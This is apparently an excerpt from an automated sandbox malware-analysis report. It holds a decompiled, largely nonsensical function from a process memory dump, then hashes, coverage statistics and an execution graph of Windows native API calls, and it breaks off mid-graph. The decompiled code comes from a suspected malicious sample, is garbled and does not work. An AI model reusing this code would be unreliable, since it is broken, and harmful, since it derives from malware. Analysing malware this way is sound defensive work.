                                                    • Instruction ID: 50cffac9a0d938cd8925e2ee3152c865f82d4a87131cc27c65afa3b220be72d5
                                                    • Opcode Fuzzy Hash: d92e2d8cfef8b7b2af1a77afa09c2977b78062515cdd301eac96965f67be81a4
                                                    • Instruction Fuzzy Hash: 4E31C471B18119CBC3089F75DA8062A7FA7B7C6300BA595ADC6439F39CDF30AD0A8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01188E9C Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E01188E9C() {
				signed int _t59;
				signed char _t60;
				signed short _t62;
				signed int _t63;
				signed int _t64;
				signed char _t65;
				signed int _t66;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed char _t71;
				signed short _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				signed int _t80;
				signed char _t81;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				intOrPtr* _t87;
				signed int _t90;
				signed int _t94;
				signed char _t104;
				signed char _t105;
				signed char _t106;
				signed int _t107;
				signed char _t108;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t117;
				signed char _t120;
				signed char _t122;
				signed char _t124;
				signed char _t128;
				signed char _t131;
				signed char _t133;
				signed char _t135;
				signed char _t136;
				signed char _t137;
				signed char _t138;
				signed char _t139;
				signed char _t142;
				signed int _t143;
				signed char* _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				signed int _t152;
				void* _t156;

				_push(ss);
				 *_t59 =  *_t59 + _t59;
				_t113 = _t112 |  *_t135;
				 *_t59 =  *_t59 + _t59;
				 *_t104 =  *_t104 + _t135;
				 *_t113 =  *_t113 ^ _t113;
				 *_t135 =  *_t135 + _t104;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 | 0x7e110000;
				asm("adc eax, 0x280a0000");
				_push(cs);
				 *_t60 =  *_t60 + _t60;
				_t114 = _t113 |  *_t135;
				_t136 = _t135 & _t60;
				 *_t144 =  *_t144 << 0xba;
				 *(_t149 + 0x20e341df) =  *(_t149 + 0x20e341df) & _t136;
				_push(_t136);
				 *(_t60 | 0x00000008) = _t104;
				asm("cmpsd");
				_pop(_t137);
				_pop(_t62);
				_t63 = _t62 & 0x0000190b;
				if(_t63 > 0) {
					 *_t63 =  *_t63 + _t63;
					_t114 = _t114 | _t144[0xc28] |  *_t63;
					_t63 = _t63 | 0x580a0000;
				}
				 *_t63 =  *_t63 + _t63;
				_t105 = _t104 |  *(_t63 + 0x5e);
				_t150 = _t149 + 1;
				_t64 = _t63 +  *_t63;
				 *_t64 =  *_t64 + _t64;
				_t143 = 0x27ffffff;
				 *_t64 =  *_t64 + _t64;
				 *_t137 =  *_t137 + _t64;
				 *_t64 =  *_t64 + _t64;
				 *_t105 =  *_t105 + _t114;
				_t65 = _t64 & 0x003fbc72;
				if(_t65 >= 0) {
					 *_t65 =  *_t65 + _t65;
					_t114 = _t114 |  *_t65;
					 *_t137 =  *_t137 + _t114;
					asm("int 0x28");
					asm("sldt word [eax]");
					_t137 = _t137 |  *_t105;
					es = cs;
					 *(_t137 + 0x11) =  *(_t137 + 0x11) | _t105;
					_t105 = _t105 -  *((intOrPtr*)(_t150 + 0x176f02));
					 *_t137 =  *_t137 + _t114;
					_t65 = (_t65 |  *_t65 | 0x7c271620) + 0x61 -  *((intOrPtr*)((_t65 |  *_t65 | 0x7c271620) + 0x61));
					 *_t105 =  *_t105 + _t137;
				}
				asm("adc esi, [eax]");
				_t66 = _t65 |  *_t65;
				asm("outsd");
				 *_t66 =  *_t66 + _t66;
				 *0x7e110000 =  *0x7e110000 + _t114;
				asm("adc eax, 0x280a0000");
				 *_t66 =  *_t66 + _t66;
				 *(_t150 + 0xcd46035) =  *(_t150 + 0xcd46035) & _t105;
				_t144[0x66] = _t144[0x66] | _t66;
				 *(_t105 + 0x58a73c40) =  *(_t105 + 0x58a73c40) & _t105;
				_t67 = _t66 & 0x0b7e190b;
				 *_t67 =  *_t67 + _t67;
				_t117 = _t114 |  *_t137 | _t144[0xc28] |  *_t67;
				_t145 = cs;
				_t151 = _t150 + 1;
				_t69 = (_t67 | 0x580a0000) +  *(_t67 | 0x580a0000);
				 *_t69 =  *_t69 + _t69;
				asm("retf");
				asm("invalid");
				 *_t137 =  *_t137 + 1;
				 *_t69 =  *_t69 + _t69;
				 *_t143 =  *_t143 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t105 =  *_t105 + _t117;
				_t70 = _t69 & 0x003fcc72;
				if(_t70 >= 0) {
					 *_t70 =  *_t70 + _t70;
					_t133 = _t117 |  *_t70;
					 *_t137 =  *_t137 + _t133;
					asm("fisubr word [eax]");
					asm("sldt word [eax]");
					_t137 = _t137 |  *_t105;
					es = cs;
					 *(_t137 + 0x11) =  *(_t137 + 0x11) | _t105;
					_t70 = (_t70 |  *_t70 | 0x504dfc20) + 0x61;
					_t151 = _t151 -  *((intOrPtr*)(_t133 + 0x186f0302));
					 *_t70 =  *_t70 + _t70;
					_t117 = _t133 |  *_t137;
					 *_t105 =  *_t105 + _t137;
				}
				asm("adc esi, [eax]");
				 *_t70 =  *_t70 | _t70;
				 *_t70 = _t70;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x7e110000;
				asm("adc eax, 0x280a0000");
				_push(cs);
				 *_t71 =  *_t71 + _t71;
				_t138 = _t137;
				 *0x80c6544 = _t71;
				 *_t143 =  *_t143 & _t71;
				_t72 = _t71 | 0x00000025;
				_t106 = _t105 |  *(_t138 + 0x66);
				 *0x2098be2e =  *0x2098be2e & _t138;
				asm("adc [ebp-0x38], bl");
				asm("out dx, eax");
				 *((intOrPtr*)(_t151 + _t138 + 0x58595966)) =  *((intOrPtr*)(_t151 + _t138 + 0x58595966)) - _t145;
				_t120 = (_t117 |  *_t137) & _t72 & _t106;
				_t146 = _t145 &  *(_t145 + 0x596666bd);
				_t73 = _t72 & 0x0000190b;
				if(_t73 > 0) {
					 *_t73 =  *_t73 + _t73;
					_t120 = _t120 |  *(_t146 + 0xc28) |  *_t73;
					_t73 = _t73 | 0x580a0000;
				}
				 *_t73 =  *_t73 + _t73;
				_t107 = _t106 |  *(_t73 + 0x5e);
				_t152 = _t151 + 1;
				_t74 = _t73 +  *_t73;
				 *_t74 =  *_t74 + _t74;
				asm("daa");
				 *_t74 =  *_t74 + _t74;
				 *_t138 =  *_t138 + _t74;
				 *_t74 =  *_t74 + _t74;
				 *((intOrPtr*)(_t74 + 0x2bffffff)) =  *((intOrPtr*)(_t74 + 0x2bffffff)) + _t138;
				_t75 = _t74 & 0x003fdc72;
				if(_t75 >= 0) {
					 *_t75 =  *_t75 + _t75;
					_t131 = _t120 |  *_t75;
					 *_t138 =  *_t138 + _t131;
					_t94 = _t75 |  *_t75 | 0xcd818b20;
					 *_t94 =  *_t94 - _t152;
					asm("sldt word [eax]");
					_t138 = _t138 |  *_t107;
					es = cs;
					 *(_t138 + 0x11) =  *(_t138 + 0x11) | _t107;
					_t120 = _t131 -  *((intOrPtr*)(_t146 + 0x196f02));
					 *_t138 =  *_t138 + _t120;
					_t75 = _t94 + 0x61 -  *((intOrPtr*)(_t94 + 0x61));
					 *_t75 =  *_t75 + _t75;
				}
				 *_t107 =  *_t107 + _t138;
				 *_t120 =  *_t120 ^ _t120;
				 *((intOrPtr*)(_t75 + _t75 + 0xd0000)) =  *((intOrPtr*)(_t75 + _t75 + 0xd0000)) + _t75;
				 *_t120 =  *_t120 + _t138;
				if( *_t120 > 0) {
					 *_t75 =  *_t75 + _t75;
					_push(cs);
					 *_t75 =  *_t75 + _t75;
					_t138 = _t138 & _t107;
					_t120 = 0x80c1b6e;
					 *[gs:ebp+0x7f] =  *[gs:ebp+0x7f] & _t138;
					_t143 = _t143 + 1;
				}
				asm("aas");
				 *(0x20665844 + _t152 * 8) =  *(0x20665844 + _t152 * 8) & _t75;
				asm("stosd");
				asm("fnstcw word [esi]");
				 *(_t152 + 0x65) =  *(_t152 + 0x65) & 0x66595a61;
				asm("o16 and [gs:ebp+0x6134ff22], ch");
				_t76 = _t75 & 0x0b7e190b;
				 *_t76 =  *_t76 + _t76;
				_t122 = _t120 |  *(_t146 + 0xc28) |  *_t76;
				 *((intOrPtr*)((_t76 | 0x580a0000) +  *(_t76 | 0x580a0000))) =  *((intOrPtr*)((_t76 | 0x580a0000) +  *(_t76 | 0x580a0000))) + (_t76 | 0x580a0000) +  *(_t76 | 0x580a0000);
				asm("invalid");
				_t80 = 0xff +  *0xff;
				 *_t80 =  *_t80 + _t80;
				asm("daa");
				 *_t80 =  *_t80 + _t80;
				 *_t107 =  *_t107 + _t122;
				_t81 = _t80 & 0x003fec72;
				if(_t81 >= 0) {
					 *_t81 =  *_t81 + _t81;
					_t128 = _t122 |  *_t81;
					 *_t138 =  *_t138 + _t128;
					_t90 = _t81 |  *_t81 | 0x9213b220;
					asm("lodsd");
					 *_t143 =  *_t143 - _t128;
					 *_t90 =  *_t90 + _t90;
					_t142 = _t138 |  *_t107;
					es = cs;
					 *(_t142 + 0x11) =  *(_t142 + 0x11) | _t107;
					_t138 = _t142 -  *((intOrPtr*)(_t142 + 0x1a28));
					_t122 = _t128 |  *_t138;
					asm("adc esi, [eax]");
					_t81 = _t90 + 0x61 |  *(_t90 + 0x61);
				}
				 *((intOrPtr*)(_t143 + 0xd000000)) =  *((intOrPtr*)(_t143 + 0xd000000)) + _t107;
				 *_t81 =  *_t81 + _t81;
				asm("adc [esi+0x15], edi");
				 *_t81 =  *_t81 + _t81;
				 *_t81 =  *_t81 + _t81;
				_t124 = _t122 |  *_t81 |  *_t138;
				 *(_t107 - 0x7e) =  *(_t107 - 0x7e) & _t107;
				 *(_t124 + 9) =  *(_t124 + 9) & _t138;
				_t108 = _t107 & _t143;
				_t139 = cs;
				 *_t139 =  *_t139 & _t124;
				asm("daa");
				_t83 = _t156 + 1;
				asm("invalid");
				asm("popad");
				 *_t108 =  *_t108 & _t139;
				asm("adc dword [ebx+eax+0x20], 0x266537bb");
				 *(_t83 + 0x5a61d493 + _t124 * 2) =  *(_t83 + 0x5a61d493 + _t124 * 2) & _t83;
				asm("invalid");
				 *(_t108 & _t124) =  *(_t108 & _t124) & _t108 & _t124;
				asm("int 0x83");
				asm("popa");
				asm("popad");
				asm("stosd");
				_push(ds);
				_t84 = _t83 & 0x0b7e190b;
				 *_t84 =  *_t84 + _t84;
				_t86 = (_t84 | 0x580a0000) +  *(_t84 | 0x580a0000);
				 *_t86 =  *_t86 + _t86;
				_t87 = _t86 -  *_t86;
				 *_t87 =  *_t87 + _t87;
				 *((intOrPtr*)(_t87 +  *_t87)) =  *((intOrPtr*)(_t87 +  *_t87)) + _t87 +  *_t87;
				asm("sahf");
				asm("invalid");
				goto [far dword [ebx];
			}

























































                                                    0x01188e9c
                                                    0x01188e9d
                                                    0x01188e9f
                                                    0x01188ea1
                                                    0x01188ea3
                                                    0x01188ea5
                                                    0x01188ea7
                                                    0x01188eaa
                                                    0x01188eac
                                                    0x01188eb1
                                                    0x01188eb6
                                                    0x01188eb7
                                                    0x01188eb9
                                                    0x01188ebb
                                                    0x01188ebd
                                                    0x01188ec2
                                                    0x01188ec8
                                                    0x01188ec9
                                                    0x01188ecb
                                                    0x01188ecc
                                                    0x01188ece
                                                    0x01188ed2
                                                    0x01188ed9
                                                    0x01188edb
                                                    0x01188ee3
                                                    0x01188ee5
                                                    0x01188ee5
                                                    0x01188ee6
                                                    0x01188ee8
                                                    0x01188eeb
                                                    0x01188eec
                                                    0x01188eee
                                                    0x01188ef0
                                                    0x01188ef5
                                                    0x01188ef7
                                                    0x01188ef9
                                                    0x01188efb
                                                    0x01188efd
                                                    0x01188f02
                                                    0x01188f05
                                                    0x01188f07
                                                    0x01188f0b
                                                    0x01188f12
                                                    0x01188f14
                                                    0x01188f17
                                                    0x01188f1b
                                                    0x01188f1c
                                                    0x01188f21
                                                    0x01188f27
                                                    0x01188f29
                                                    0x01188f2b
                                                    0x01188f2b
                                                    0x01188f2c
                                                    0x01188f2e
                                                    0x01188f30
                                                    0x01188f31
                                                    0x01188f33
                                                    0x01188f39
                                                    0x01188f3f
                                                    0x01188f43
                                                    0x01188f49
                                                    0x01188f4c
                                                    0x01188f52
                                                    0x01188f57
                                                    0x01188f5f
                                                    0x01188f66
                                                    0x01188f67
                                                    0x01188f68
                                                    0x01188f6a
                                                    0x01188f6c
                                                    0x01188f6d
                                                    0x01188f6f
                                                    0x01188f71
                                                    0x01188f73
                                                    0x01188f75
                                                    0x01188f77
                                                    0x01188f79
                                                    0x01188f7e
                                                    0x01188f81
                                                    0x01188f83
                                                    0x01188f87
                                                    0x01188f8e
                                                    0x01188f90
                                                    0x01188f93
                                                    0x01188f97
                                                    0x01188f98
                                                    0x01188f9b
                                                    0x01188f9d
                                                    0x01188fa3
                                                    0x01188fa5
                                                    0x01188fa7
                                                    0x01188fa7
                                                    0x01188fa8
                                                    0x01188faa
                                                    0x01188fac
                                                    0x01188fae
                                                    0x01188fb0
                                                    0x01188fb5
                                                    0x01188fba
                                                    0x01188fbb
                                                    0x01188fbf
                                                    0x01188fc1
                                                    0x01188fc6
                                                    0x01188fc8
                                                    0x01188fca
                                                    0x01188fcd
                                                    0x01188fd3
                                                    0x01188fd6
                                                    0x01188fd9
                                                    0x01188fe0
                                                    0x01188fe2
                                                    0x01188fe8
                                                    0x01188fec
                                                    0x01188fee
                                                    0x01188ff6
                                                    0x01188ff8
                                                    0x01188ff8
                                                    0x01188ff9
                                                    0x01188ffb
                                                    0x01188ffe
                                                    0x01188fff
                                                    0x01189001
                                                    0x01189003
                                                    0x01189004
                                                    0x01189006
                                                    0x01189008
                                                    0x0118900a
                                                    0x01189010
                                                    0x01189015
                                                    0x01189018
                                                    0x0118901a
                                                    0x0118901e
                                                    0x01189020
                                                    0x01189025
                                                    0x01189027
                                                    0x0118902a
                                                    0x0118902e
                                                    0x0118902f
                                                    0x01189034
                                                    0x0118903a
                                                    0x0118903c
                                                    0x0118903e
                                                    0x0118903e
                                                    0x0118903f
                                                    0x01189041
                                                    0x01189043
                                                    0x0118904a
                                                    0x0118904c
                                                    0x0118904e
                                                    0x01189052
                                                    0x01189053
                                                    0x01189057
                                                    0x01189059
                                                    0x0118905e
                                                    0x01189062
                                                    0x01189062
                                                    0x01189063
                                                    0x01189064
                                                    0x0118906b
                                                    0x0118906c
                                                    0x0118906e
                                                    0x01189075
                                                    0x0118907d
                                                    0x01189082
                                                    0x0118908a
                                                    0x01189095
                                                    0x01189099
                                                    0x0118909b
                                                    0x0118909d
                                                    0x0118909f
                                                    0x011890a0
                                                    0x011890a2
                                                    0x011890a4
                                                    0x011890a9
                                                    0x011890ac
                                                    0x011890ae
                                                    0x011890b2
                                                    0x011890b4
                                                    0x011890b9
                                                    0x011890ba
                                                    0x011890bc
                                                    0x011890be
                                                    0x011890c2
                                                    0x011890c3
                                                    0x011890c8
                                                    0x011890ce
                                                    0x011890d0
                                                    0x011890d2
                                                    0x011890d2
                                                    0x011890d3
                                                    0x011890d9
                                                    0x011890db
                                                    0x011890de
                                                    0x011890e3
                                                    0x011890e5
                                                    0x011890e7
                                                    0x011890ee
                                                    0x011890f1
                                                    0x011890f3
                                                    0x011890f4
                                                    0x011890f6
                                                    0x011890f7
                                                    0x011890f8
                                                    0x011890fa
                                                    0x011890fc
                                                    0x011890fe
                                                    0x01189106
                                                    0x0118910f
                                                    0x01189112
                                                    0x01189115
                                                    0x01189118
                                                    0x0118911a
                                                    0x0118911e
                                                    0x0118911f
                                                    0x01189121
                                                    0x01189128
                                                    0x01189139
                                                    0x0118913b
                                                    0x0118913d
                                                    0x0118913f
                                                    0x01189143
                                                    0x01189145
                                                    0x01189146
                                                    0x01189148

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947213115.0000000001182000.00000040.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                    • Associated: 00000005.00000002.947177352.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1180000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64f32b6298d729965e2405e47c9b48dfe997b72bf8d34ae13eff21ac79e28433
                                                    • Instruction ID: c5e8a614f1964f8dfd8567fdfd36a88fc49827c7acc79a3c128513d63c569f8b
                                                    • Opcode Fuzzy Hash: 64f32b6298d729965e2405e47c9b48dfe997b72bf8d34ae13eff21ac79e28433
                                                    • Instruction Fuzzy Hash: 7731176641EBD18FC7039B744CB26D27FB25E17220B2E49CBC4C18F4A3C614A659D326
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:2.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:639
                                                    Total number of Limit Nodes:81
                                                    execution_graph 63990 b0f900 LdrInitializeThunk 63991 41fe70 63992 41fe7b 63991->63992 63994 41c420 63991->63994 63995 41c446 63994->63995 64008 409cb0 63995->64008 63997 41c452 63998 41c4ac 63997->63998 64016 40de40 63997->64016 63998->63992 64000 41c467 64001 41c47a 64000->64001 64028 40de00 64000->64028 64004 41c48f 64001->64004 64069 41b090 64001->64069 64033 40ba80 64004->64033 64006 41c49e 64007 41b090 2 API calls 64006->64007 64007->63998 64010 409cbd 64008->64010 64072 409c00 64008->64072 64011 409cc4 64010->64011 64084 409ba0 64010->64084 64011->63997 64017 40de6c 64016->64017 64491 40b130 64017->64491 64019 40de7e 64495 40dd10 64019->64495 64022 40de99 64025 40dea4 64022->64025 64026 41ae70 2 API calls 64022->64026 64023 40dec2 64023->64000 64024 40deb1 64024->64023 64027 41ae70 2 API calls 64024->64027 64025->64000 64026->64025 64027->64023 64029 40de1f 64028->64029 64030 4160c0 LdrLoadDll 64028->64030 64031 40de26 64029->64031 64032 40de28 GetUserGeoID 64029->64032 64030->64029 64031->64001 64032->64001 64034 40ba83 64033->64034 64035 40b130 LdrLoadDll 64034->64035 64036 40bafc 64035->64036 64514 40adb0 64036->64514 64038 40bd73 64038->64006 64039 40bb22 64039->64038 64523 4155e0 64039->64523 64041 40bb67 64041->64038 64526 407ec0 64041->64526 64043 40bbab 64043->64038 64544 41aee0 64043->64544 64047 40bc01 64048 40bc08 64047->64048 64557 41a9f0 64047->64557 64050 41c940 2 API calls 64048->64050 64052 40bc15 64050->64052 64052->64006 64053 40bc52 64054 41c940 2 API calls 64053->64054 64055 40bc59 64054->64055 64055->64006 64056 40bc62 64057 40ded0 3 API calls 64056->64057 64058 40bcd6 64057->64058 64058->64048 64059 40bce1 64058->64059 64060 41c940 2 API calls 64059->64060 64061 40bd05 64060->64061 64563 41aa40 64061->64563 64064 41a9f0 2 API calls 64065 40bd40 64064->64065 64065->64038 64568 41a800 64065->64568 64068 41b090 2 API calls 64068->64038 64070 41b0af ExitProcess 64069->64070 64071 41b9b0 LdrLoadDll 64069->64071 64071->64070 64073 409c13 64072->64073 64123 4195a0 LdrLoadDll 64072->64123 64103 419450 64073->64103 64076 409c26 64076->64010 64077 409c1c 64077->64076 64106 41bd60 64077->64106 64079 409c63 64079->64076 64117 409a40 64079->64117 64081 409c83 64124 4094a0 LdrLoadDll 64081->64124 64083 409c95 64083->64010 64466 41c050 64084->64466 64087 41c050 LdrLoadDll 64088 409bcb 64087->64088 64089 41c050 LdrLoadDll 64088->64089 64090 409be1 64089->64090 64091 40dc00 64090->64091 64092 40dc19 64091->64092 64474 40afb0 64092->64474 64094 40dc2c 64478 41abc0 64094->64478 64097 409cd5 64097->63997 64099 40dc52 64100 40dc7d 64099->64100 64484 41ac40 64099->64484 64102 41ae70 2 API calls 64100->64102 64102->64097 64125 41afe0 64103->64125 64107 41bd79 64106->64107 64138 415cb0 64107->64138 64109 41bd91 64110 41bd9a 64109->64110 64177 41bba0 64109->64177 64110->64079 64112 41bdae 64112->64110 64194 41a8e0 64112->64194 64444 4072a0 64117->64444 64119 409a61 64119->64081 64120 409a5a 64120->64119 64457 407560 64120->64457 64123->64073 64124->64083 64126 419465 64125->64126 64128 41b9b0 64125->64128 64126->64077 64129 41ba35 64128->64129 64131 41b9bf 64128->64131 64129->64126 64131->64129 64132 4160c0 64131->64132 64133 4160da 64132->64133 64134 4160ce 64132->64134 64133->64129 64134->64133 64137 416540 LdrLoadDll 64134->64137 64136 41622c 64136->64129 64137->64136 64139 415ff3 64138->64139 64149 415cc4 64138->64149 64139->64109 64142 415de2 64142->64109 64143 415df5 64206 41ad40 64143->64206 64144 415dd8 64263 41ae40 LdrLoadDll 64144->64263 64147 415e1c 64148 41c940 2 API calls 64147->64148 64152 415e28 64148->64152 64149->64139 64203 41a630 64149->64203 64150 415fb7 64153 41ae70 2 API calls 64150->64153 64151 415fcd 64272 4159d0 LdrLoadDll NtReadFile NtClose 64151->64272 64152->64142 64152->64150 64152->64151 64157 415ec0 64152->64157 64154 415fbe 64153->64154 64154->64109 64156 415fe0 64156->64109 64158 415f27 64157->64158 64160 415ecf 64157->64160 64158->64150 64159 415f3a 64158->64159 64265 41acc0 64159->64265 64162 415ed4 64160->64162 64163 415ee8 64160->64163 64264 415890 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 64162->64264 64166 415f05 64163->64166 64167 415eed 64163->64167 64166->64154 64221 415650 64166->64221 64209 415930 64167->64209 64169 415ede 64169->64109 64171 415efb 64171->64109 64173 415f9a 64269 41ae70 64173->64269 64174 415f1d 64174->64109 64176 415fa6 64176->64109 64178 41bbbb 64177->64178 64179 41bbcd 64178->64179 64290 41c8c0 64178->64290 64179->64112 64181 41bbed 64293 4152b0 64181->64293 64183 41bc10 64183->64179 64184 4152b0 3 API calls 64183->64184 64186 41bc32 64184->64186 64186->64179 64318 416600 64186->64318 64187 41bcba 64188 41bcca 64187->64188 64413 41b930 LdrLoadDll LdrInitializeThunk 64187->64413 64329 41b7a0 64188->64329 64191 41bcf8 64408 41a8a0 64191->64408 64195 41a8ef 64194->64195 64196 41b9b0 LdrLoadDll 64195->64196 64197 41a8fc 64196->64197 64440 b0fae8 LdrInitializeThunk 64197->64440 64198 41a917 64200 41c940 64198->64200 64441 41b050 64200->64441 64202 41be09 64202->64079 64204 41b9b0 LdrLoadDll 64203->64204 64205 415da9 64203->64205 64204->64205 64205->64142 64205->64143 64205->64144 64207 41b9b0 LdrLoadDll 64206->64207 64208 41ad5c NtCreateFile 64207->64208 64208->64147 64210 41594c 64209->64210 64211 41acc0 LdrLoadDll 64210->64211 64212 41596d 64211->64212 64213 415974 64212->64213 64214 415988 64212->64214 64215 41ae70 2 API calls 64213->64215 64216 41ae70 2 API calls 64214->64216 64217 41597d 64215->64217 64218 415991 64216->64218 64217->64171 64273 41cb50 LdrLoadDll RtlAllocateHeap 64218->64273 64220 41599c 64220->64171 64222 41569b 64221->64222 64223 4156ce 64221->64223 64224 41acc0 LdrLoadDll 64222->64224 64225 415819 64223->64225 64229 4156ea 64223->64229 64226 4156b6 64224->64226 64227 41acc0 LdrLoadDll 64225->64227 64228 41ae70 2 API calls 64226->64228 64233 415834 64227->64233 64230 4156bf 64228->64230 64231 41acc0 LdrLoadDll 64229->64231 64230->64174 64232 415705 64231->64232 64235 415721 64232->64235 64236 41570c 64232->64236 64286 41ad00 LdrLoadDll 64233->64286 64237 415726 64235->64237 64244 41573c 64235->64244 64239 41ae70 2 API calls 64236->64239 64240 41ae70 2 API calls 64237->64240 64238 41586e 64241 41ae70 2 API calls 64238->64241 64242 415715 64239->64242 64243 41572f 64240->64243 64245 415879 64241->64245 64242->64174 64243->64174 64246 415741 64244->64246 64274 41cb10 64244->64274 64245->64174 64251 415753 64246->64251 64277 41adf0 64246->64277 64249 4157a7 64250 4157be 64249->64250 64285 41ac80 LdrLoadDll 64249->64285 64253 4157c5 64250->64253 64254 4157da 64250->64254 64251->64174 64255 41ae70 2 API calls 64253->64255 64256 41ae70 2 API calls 64254->64256 64255->64251 64257 4157e3 64256->64257 64258 41580f 64257->64258 64280 41c710 64257->64280 64258->64174 64260 4157fa 64261 41c940 2 API calls 64260->64261 64262 415803 64261->64262 64262->64174 64263->64142 64264->64169 64266 41b9b0 LdrLoadDll 64265->64266 64267 415f82 64266->64267 64268 41ad00 LdrLoadDll 64267->64268 64268->64173 64270 41ae8c NtClose 64269->64270 64271 41b9b0 LdrLoadDll 64269->64271 64270->64176 64271->64270 64272->64156 64273->64220 64287 41b010 64274->64287 64276 41cb28 64276->64246 64278 41b9b0 LdrLoadDll 64277->64278 64279 41ae0c NtReadFile 64278->64279 64279->64249 64281 41c734 64280->64281 64282 41c71d 64280->64282 64281->64260 64282->64281 64283 41cb10 2 API calls 64282->64283 64284 41c74b 64283->64284 64284->64260 64285->64250 64286->64238 64288 41b9b0 LdrLoadDll 64287->64288 64289 41b02c RtlAllocateHeap 64288->64289 64289->64276 64414 41af20 64290->64414 64292 41c8ed 64292->64181 64294 4152c1 64293->64294 64295 4152c9 64293->64295 64294->64183 64317 41559c 64295->64317 64417 41daf0 64295->64417 64297 41531d 64298 41daf0 2 API calls 64297->64298 64302 415328 64298->64302 64299 415376 64301 41daf0 2 API calls 64299->64301 64303 41538a 64301->64303 64302->64299 64422 41db90 64302->64422 64304 41daf0 2 API calls 64303->64304 64306 4153fd 64304->64306 64305 41daf0 2 API calls 64312 415445 64305->64312 64306->64305 64308 415574 64429 41db50 LdrLoadDll RtlFreeHeap 64308->64429 64310 41557e 64430 41db50 LdrLoadDll RtlFreeHeap 64310->64430 64428 41db50 LdrLoadDll RtlFreeHeap 64312->64428 64313 415588 64431 41db50 LdrLoadDll RtlFreeHeap 64313->64431 64315 415592 64432 41db50 LdrLoadDll RtlFreeHeap 64315->64432 64317->64183 64319 416611 64318->64319 64320 415cb0 8 API calls 64319->64320 64322 416627 64320->64322 64321 416630 64321->64187 64322->64321 64323 416667 64322->64323 64326 4166b3 64322->64326 64324 41c940 2 API calls 64323->64324 64325 416678 64324->64325 64325->64187 64327 41c940 2 API calls 64326->64327 64328 4166b8 64327->64328 64328->64187 64330 41b7b4 64329->64330 64331 41b630 LdrLoadDll 64329->64331 64433 41b630 64330->64433 64331->64330 64333 41b7bd 64334 41b630 LdrLoadDll 64333->64334 64335 41b7c6 64334->64335 64336 41b630 LdrLoadDll 64335->64336 64337 41b7cf 64336->64337 64338 41b630 LdrLoadDll 64337->64338 64339 41b7d8 64338->64339 64340 41b630 LdrLoadDll 64339->64340 64341 41b7e1 64340->64341 64342 41b630 LdrLoadDll 64341->64342 64343 41b7ed 64342->64343 64344 41b630 LdrLoadDll 64343->64344 64345 41b7f6 64344->64345 64346 41b630 LdrLoadDll 64345->64346 64347 41b7ff 64346->64347 64348 41b630 LdrLoadDll 64347->64348 64349 41b808 64348->64349 64350 41b630 LdrLoadDll 64349->64350 64351 41b811 64350->64351 64352 41b630 LdrLoadDll 64351->64352 64353 41b81a 64352->64353 64354 41b630 LdrLoadDll 64353->64354 64355 41b826 64354->64355 64356 41b630 LdrLoadDll 64355->64356 64357 41b82f 64356->64357 64358 41b630 LdrLoadDll 64357->64358 64359 41b838 64358->64359 64360 41b630 LdrLoadDll 64359->64360 64361 41b841 64360->64361 64362 41b630 LdrLoadDll 64361->64362 64363 41b84a 64362->64363 64364 41b630 LdrLoadDll 64363->64364 64365 41b853 64364->64365 64366 41b630 LdrLoadDll 64365->64366 64367 41b85f 64366->64367 64368 41b630 LdrLoadDll 64367->64368 64369 41b868 64368->64369 64370 41b630 LdrLoadDll 64369->64370 64371 41b871 64370->64371 64372 41b630 LdrLoadDll 64371->64372 64373 41b87a 64372->64373 64374 41b630 LdrLoadDll 64373->64374 64375 41b883 64374->64375 64376 41b630 LdrLoadDll 64375->64376 64377 41b88c 64376->64377 64378 41b630 LdrLoadDll 64377->64378 64379 41b898 64378->64379 64380 41b630 LdrLoadDll 64379->64380 64381 41b8a1 64380->64381 64382 41b630 LdrLoadDll 64381->64382 64383 41b8aa 64382->64383 64384 41b630 LdrLoadDll 64383->64384 64385 41b8b3 64384->64385 64386 41b630 LdrLoadDll 64385->64386 64387 41b8bc 64386->64387 64388 41b630 LdrLoadDll 64387->64388 64389 41b8c5 64388->64389 64390 41b630 LdrLoadDll 64389->64390 64391 41b8d1 64390->64391 64392 41b630 LdrLoadDll 64391->64392 64393 41b8da 64392->64393 64394 41b630 LdrLoadDll 64393->64394 64395 41b8e3 64394->64395 64396 41b630 LdrLoadDll 64395->64396 64397 41b8ec 64396->64397 64398 41b630 LdrLoadDll 64397->64398 64399 41b8f5 64398->64399 64400 41b630 LdrLoadDll 64399->64400 64401 41b8fe 64400->64401 64402 41b630 LdrLoadDll 64401->64402 64403 41b90a 64402->64403 64404 41b630 LdrLoadDll 64403->64404 64405 41b913 64404->64405 64406 41b630 LdrLoadDll 64405->64406 64407 41b91c 64406->64407 64407->64191 64409 41b9b0 LdrLoadDll 64408->64409 64410 41a8bc 64409->64410 64439 b0fdc0 LdrInitializeThunk 64410->64439 64411 41a8d3 64411->64112 64413->64188 64415 41af3c NtAllocateVirtualMemory 64414->64415 64416 41b9b0 LdrLoadDll 64414->64416 64415->64292 64416->64415 64418 41db00 64417->64418 64419 41db06 64417->64419 64418->64297 64420 41cb10 2 API calls 64419->64420 64421 41db2c 64420->64421 64421->64297 64423 41dbb5 64422->64423 64425 41dbed 64422->64425 64424 41cb10 2 API calls 64423->64424 64426 41dbca 64424->64426 64425->64302 64427 41c940 2 API calls 64426->64427 64427->64425 64428->64308 64429->64310 64430->64313 64431->64315 64432->64317 64434 41b64b 64433->64434 64435 4160c0 LdrLoadDll 